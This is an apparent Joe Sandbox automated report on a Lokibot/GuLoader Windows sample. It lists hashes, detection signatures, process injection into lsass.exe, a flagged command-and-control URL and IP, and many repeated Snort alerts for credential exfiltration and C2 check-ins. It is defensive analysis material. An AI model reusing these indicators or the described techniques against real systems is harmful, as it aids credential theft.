Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report QVWb1n5OTH.exe

Overview

General Information

Sample Name:QVWb1n5OTH.exe
Analysis ID:532182
MD5:f8236209c7b1928b3f1eb0a7074f6992
SHA1:7f31471385b39722a1c7a6e983ecca372e673796
SHA256:eab40778e702a859cc33abcd92e796755e95e8fdb0eeb7c5243b7c1866751bb0
Infos:

Most interesting Screenshot:

Detection

GuLoader Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Creates HTML files with .exe extension (expired dropper behavior)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • QVWb1n5OTH.exe (PID: 4848 cmdline: "C:\Users\user\Desktop\QVWb1n5OTH.exe" MD5: F8236209C7B1928B3F1EB0A7074F6992)
    • QVWb1n5OTH.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\QVWb1n5OTH.exe" MD5: F8236209C7B1928B3F1EB0A7074F6992)
      • lsass.exe (PID: 1012 cmdline: C:\Windows\system32\lsass.exe MD5: 15A556DEF233F112D127025AB51AC2D3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: QVWb1n5OTH.exe PID: 7056JoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\lsass.exe, CommandLine: C:\Windows\system32\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\lsass.exe, NewProcessName: C:\Windows\System32\lsass.exe, OriginalFileName: C:\Windows\System32\lsass.exe, ParentCommandLine: "C:\Users\user\Desktop\QVWb1n5OTH.exe" , ParentImage: C:\Users\user\Desktop\QVWb1n5OTH.exe, ParentProcessId: 7056, ProcessCommandLine: C:\Windows\system32\lsass.exe, ProcessId: 1012

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: QVWb1n5OTH.exeVirustotal: Detection: 60%Perma Link
    Source: QVWb1n5OTH.exeMetadefender: Detection: 28%Perma Link
    Source: QVWb1n5OTH.exeReversingLabs: Detection: 48%
    Antivirus detection for URL or domainShow sources
    Source: http://secure01-redirect.net/gb13/fre.php:jAvira URL Cloud: Label: phishing
    Source: http://secure01-redirect.net/gb13/fre.phpAvira URL Cloud: Label: phishing
    Multi AV Scanner detection for domain / URLShow sources
    Source: secure01-redirect.netVirustotal: Detection: 19%Perma Link
    Source: QVWb1n5OTH.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\AERIFIED.pdb source: QVWb1n5OTH.exe

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49814 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49814 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49814 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49814 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49815 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49815 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49816 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49816 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49816 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49816 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49816
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49817 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49817 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49817 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49817 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49817
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49819 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49819 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49819 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49819 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49819
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49820 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49820 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49820 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49820 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49820
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49821 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49821 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49821 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49821 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49821
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49822 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49822 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49822 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49822 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49822
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49823 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49823 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49823 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49823 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49823
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49824 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49824 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49824 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49824 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49824
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49825 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49825 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49825 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49825 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49825
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49826 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49826 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49826 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49826 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49826
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49828 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49828 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49828 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49828 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49828
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49829 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49829 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49829 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49829 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49829
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49830 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49830 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49830 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49830 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49830
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49832 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49832 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49832 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49832 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49832
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49833 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49833 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49833 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49833 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49833
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49834 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49834 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49834 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49834 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49834
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49835 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49835 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49835 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49835 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49835
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49836 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49836 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49836 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49836 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49836
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49837 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49837 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49837 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49837 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49837
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49838 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49838 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49838 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49838 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49838
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49839 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49839 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49839 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49839 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49839
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49840 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49840 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49840 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49840 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49840
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49841 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49841 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49841 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49841 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49841
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49842 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49842 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49842 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49842 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49842
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49843 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49843 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49843 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49843 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49843
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49844 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49844 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49844 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49844 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49844
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49845 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49845 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49845 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49845 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49845
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49847 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49847 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49847 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49847 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49847
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49848 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49848 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49848 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49848 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49848
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49849 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49849 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49849 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49849 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49849
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49850 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49850 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49850 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49850 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49850
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49851 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49851 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49851 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49851 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49851
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49852 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49852 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49852 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49852 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49852
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49853 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49853 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49853 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49853 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49853
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49854 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49854 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49854 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49854 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49854
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49855 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49855 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49855 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49855 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49855
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49856 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49856 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49856 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49856 -> 85.209.2.33:80
